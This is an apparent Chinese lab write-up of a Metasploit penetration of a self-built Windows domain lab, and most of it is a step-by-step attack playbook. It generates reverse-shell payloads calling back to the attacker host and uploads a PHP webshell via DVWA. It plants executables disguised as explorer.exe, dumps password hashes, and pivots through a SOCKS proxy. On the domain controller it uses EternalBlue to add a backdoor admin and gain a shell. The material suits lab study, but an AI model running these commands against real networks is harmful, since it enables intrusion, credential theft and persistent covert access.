实验名称:利用MSF打穿内网
实验人:XX
实验日期:2021.10.16
实验目的:利用MSF进行内网渗透
实验拓扑:
实验环境:
所用机器 | 网络类型 | IP | 默认网关 | DNS |
攻击机:kali | NAT | 172.16.12.30/24 | 172.16.12.2 | 114.114.114.114 |
Web服务器 | NAT | 172.16.12.10/24 | 172.16.12.2 | 114.114.114.114 |
仅主机 | 192.168.11.13/24 | |||
防火墙 | WAN | 172.16.12.50/24 | ||
LAN | 192.168.11.2/24:880 | |||
域控制器:DC | 仅主机 | 192.168.11.3/24 | 192.168.11.2 | 127.0.0.1 |
域成员:CY | 仅主机 | 192.168.11.101/24 | 192.168.11.2 | 192.168.11.3 |
实验步骤:
一、搭建靶场环境
1、kali网络配置(略)
2、WebServer网络配置:添加两块网卡,一块为nat模式,一块为仅主机,ip配置如上表
3、防火墙网络设置:
安装海蜘蛛虚拟机作为防火墙,进入以后,按Enter
输入2,回车
输入1,指定LAN1,按回车
设置ip及端口为192.168.11.2:880,按回车
使用域控DC访问http://192.168.11.2:880,弹出页面输入用户名admin,密码admin进入海蜘蛛防火墙配置
在页面点击WAN1,进入外网忘了配置
在网卡位置下拉菜单选择空闲网卡,点击绑定
设置好IP,点击页面底部保存设置,防火墙网络就配置完成
4、域控DC和域成员网络配置
1)两台电脑网络模式都改为仅主机
点击VMware最上面菜单栏——虚拟机——设置
选择网络适配器,选择自定义,下拉菜单选择VMnet1(仅主机模式)
2)域控DC网络设置如下
3)域成员CY网络设置如下
5、内网windows域配置
1)创建windows域
右击计算机——属性——高级系统设置——计算机名——更改,改为DC
点击其他,后缀改成sw.org,计算机名改为DC,点击确定,然后重启计算机
重启后运行win+r,输入dcpromo,点下一步
继续点下一步
选择再新林中新建域,点击下一步
设置域的FQDN全称,点下一步
选择R2,点下一步
出现无法创建,点确定,出现如下界面,点下一步
选DNS,点下一步
设置管理员密码,点下一步
再点下一步
等待安装完成,时间有点久
点击完成
重启计算机
2)配置windows域
a、配置域成员
登录域成员CY,右击计算机——属性——高级系统设置——计算机名——更改,改为CY,隶属于选择域,输入sw.org,点击确定
输入DC的管理员账号administrator和密码c!112233,点击确定
出现欢迎加入则本机成功加入域
b、配置域控
重启DC后,点击开始——管理工具——active directory 用户和计算机
点击sw.org——Computers,发现刚才的域成员CY
把CY配置到设定的部门,比如我们这里新建一个市场部
右击sw.org,点新建——组织单位,输入shichangbu
鼠标拖动域成员CY,拉到shichangbu
比如新入职一个员工李逵,可以给李逵创建登录公司电脑的账户并指定能登录的电脑
右击空白——新建——用户
输入用户信息
设置likui的密码
点击完成
我们还可以配置likui登录电脑的时间
双击likui,点击账户——登录时间,蓝色表示该时间段可以登录
退出点击登录到
选择下列计算机,输入CY,点击添加,然后点击确定,这样likui就只能登陆到CY这台电脑。
其他配置请自行研究,至此windows域配置完成。
二、渗透边缘WebServer服务器
1、用kali扫描WebServer
┌──(root💀kali)-[~/desktop]
└─# msfdb run
[i] Database already started
[*] Starting persistent handler(s)...
msf6 > db_nmap -sS -n A 172.16.12.10
msf6 > db_nmap -p- -sS -sV -n -v --reason --open 172.16.12.10
2、生成攻击载荷,即木马文件
msf6 > msfvenom -p php/meterpreter_reverse_tcp LHOST=172.16.12.30 LPORT=4444 -f raw >msf.php
3、上传木马后门,并利用后门建立连接
浏览器访问WebServer http://172.16.12.10:81
选择左侧列表DVWA,安全级别调整为Low,提交
点击左侧列表文件上传,点击浏览,选择刚才生成的木马文件msf.php,点击上传
切换回终端,运行连接器(侦听器)
msf6 > use exploit/multi/handler
切换回浏览器,复制木马文件路径,并新开一个窗口进行访问http://172.16.12.10:81/hackable/uploads/msf.php
切换回终端,输入getuid,发现成功渗透WebServer管理员账户
切换到后台备用
meterpreter > background
[*] Backgrounding session 1...
4、以上连接不太稳定,现在我们建立梗稳固的连接
生成“exe”后门
msf6 exploit(multi/handler) > msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.16.12.30 LPORT=5555 -f exe > explorer.exe
后台运行连接器(开启监听模块)
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > exploit -j
从后台调出刚才已连接的会话sessions 1
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
上传exe木马文件
meterpreter > upload /root/desktop/explorer.exe d:\\
运行刚上传的exe木马后门,成功连接
meterpreter > execute -H -f c:\\explorer.exe
把sessions 1退到后台,并调出刚建立的新会话,查看meterpreter身份
操作提权,成功获得最高权限
5、随后可以进行一系列操作,比如
查看所有账户密码
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ade94ec73d7050890303cfb17d2556c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
发现内网中的域控DC及其他主机
meterpreter > ps
迁移进程,做好伪装
meterpreter > migrate 2208
meterpreter也可以利用portfwd命令建反弹端口
merpreter > portfwd add -l 2222 -r 192.168.11.3 -p 3389
二、设置反向代理
1、查看本地子网路由信息
meterpreter > run get_local_subnets
2、添加路由条目
meterpreter > run autoroute -s 192.168.11.0/24
3、打印路由信息,并把会话调到后台运行
meterpreter > run autoroute -p
meterpreter > background
msf6 exploit(multi/handler) > back
4、修改代理配置文件
msf6 > vim /etc/proxychains4.conf
注释掉52行 proxy_dns
在[ProxyList]下面添加socks4 172.16.12.30 1080
保存退出
5、使用以下模块开启反向代理服务
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost 172.16.12.30
msf6 auxiliary(server/socks_proxy) > run
msf6 auxiliary(server/socks_proxy) > #按回车
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > jobs
扫描代理服务哪些端口开放
msf6 > proxychains nmap -p 1-10000 -Pn -sT 192.168.11.3
三、对内网进行扫描攻击
1、利用445端口进行扫描
sf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.11.3
msf6 auxiliary(scanner/smb/smb_version) > run
2、利用“永恒之蓝”获得管理员权限
利用永恒之蓝获得管理员权限
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.11.3
msf6 auxiliary(scanner/smb/smb_version) > run
back返回
利用永恒之蓝创建远程登录账户hacker
msf6 > use auxiliary/admin/smb/ms17_010_command
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.11.3
msf6 auxiliary(admin/smb/ms17_010_command) > set command net user hacker p!112233 /add
command => net user hacker p!112233 /add
msf6 auxiliary(admin/smb/ms17_010_command) > run
把hacker加入管理员组
msf6 auxiliary(admin/smb/ms17_010_command) > set command net localgroup administrators hacker /add
msf6 auxiliary(admin/smb/ms17_010_command) > run
3、再利用永恒之蓝打下shell
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.11.3
msf6 exploit(windows/smb/psexec) > set smbuser hacker
msf6 exploit(windows/smb/psexec) > set smbpass p!112233
msf6 exploit(windows/smb/psexec) > set lport 6666
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > run
background把会话调到后台
四、在内网的域控DC上建立稳固后门
1、生成后门
msf6 > msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.16.12.30 LPORT=7777 -f exe > exploror.exe
2、开启监听器,放到后台运行
msf6 exploit(windows/smb/psexec) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.12.30
msf6 exploit(multi/handler) > set lport 7777
msf6 exploit(multi/handler) > run -j
3、调出刚才和内网建立的sessions,并上传刚才生成的后门文件
msf6 exploit(multi/handler) > sessions
msf6 exploit(multi/handler) > sessions 7
meterpreter > upload /root/desktop/exploror.exe d:\\
background退到后台
4、运行后门
msf6 > use auxiliary/admin/smb/ms17_010_command
msf6 auxiliary(admin/smb/ms17_010_command) > set command d:\\exploror.exe
msf6 auxiliary(admin/smb/ms17_010_command) > run
查看会话,新增了sessions 8,成功建立稳固后门
至此,内网穿透模拟实验完成!
实验所需要的安装包没有的话请私信我,编写不易,转载请注明原作者,希望大家给我点点关注,不定期更新技术贴